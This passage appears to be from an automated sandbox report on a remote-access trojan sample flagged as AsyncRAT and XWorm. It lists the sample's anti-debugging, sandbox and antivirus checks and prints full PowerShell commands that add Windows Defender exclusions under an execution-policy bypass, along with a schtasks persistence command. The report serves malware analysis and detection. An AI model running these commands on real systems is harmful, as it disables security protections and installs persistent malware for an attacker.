                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeThread delayed: delay time: 922337203685477
                            Source: 5q4X9fRo4b.exe, 00000000.00000002.2536068182.000000001BDD6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll:
                            Source: SystemUser32.exe.0.drBinary or memory string: vmware
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess information queried: ProcessInformationJump to behavior

                            Anti Debugging

                            barindex
                            Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeCode function: 0_2_00007FFAACCE7631 CheckRemoteDebuggerPresent,0_2_00007FFAACCE7631
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeMemory allocated: page read and write | page guardJump to behavior

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            Adds a directory exclusion to Windows Defender
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\5q4X9fRo4b.exe'
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\SystemUser32.exe'
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\5q4X9fRo4b.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\SystemUser32.exe'Jump to behavior
                            Bypasses PowerShell execution policy
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\5q4X9fRo4b.exe'
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\5q4X9fRo4b.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '5q4X9fRo4b.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\SystemUser32.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SystemUser32.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SystemUser32" /tr "C:\Users\user\AppData\Roaming\SystemUser32.exe"Jump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeQueries volume information: C:\Users\user\Desktop\5q4X9fRo4b.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeQueries volume information: C:\Users\user\AppData\Roaming\SystemUser32.exe VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeQueries volume information: C:\Users\user\AppData\Roaming\SystemUser32.exe VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeQueries volume information: C:\Users\user\AppData\Roaming\SystemUser32.exe VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exeQueries volume information: C:\Users\user\AppData\Roaming\SystemUser32.exe VolumeInformation
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                            Lowering of HIPS / PFW / Operating System Security Settings

                            barindex
                            Yara detected AsyncRAT
                            Source: Yara matchFile source: 5q4X9fRo4b.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.5q4X9fRo4b.exe.d30000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000000.1242257405.0000000000D32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\SystemUser32.exe, type: DROPPED
                            Source: 5q4X9fRo4b.exe, 00000000.00000002.2535412525.000000001BDBB000.00000004.00000020.00020000.00000000.sdmp, 5q4X9fRo4b.exe, 00000000.00000002.2536068182.000000001BDD6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                            Stealing of Sensitive Information

                            barindex
                            Yara detected XWorm
                            Source: Yara matchFile source: 5q4X9fRo4b.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.5q4X9fRo4b.exe.d30000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000002.2502473225.0000000002F8A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000000.1242257405.0000000000D32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.2502473225.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: 5q4X9fRo4b.exe PID: 1408, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\SystemUser32.exe, type: DROPPED

                            Remote Access Functionality

                            barindex
                            Yara detected XWorm
                            Source: Yara matchFile source: 5q4X9fRo4b.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.5q4X9fRo4b.exe.d30000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000002.2502473225.0000000002F8A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000000.1242257405.0000000000D32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.2502473225.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: 5q4X9fRo4b.exe PID: 1408, type: MEMORYSTR
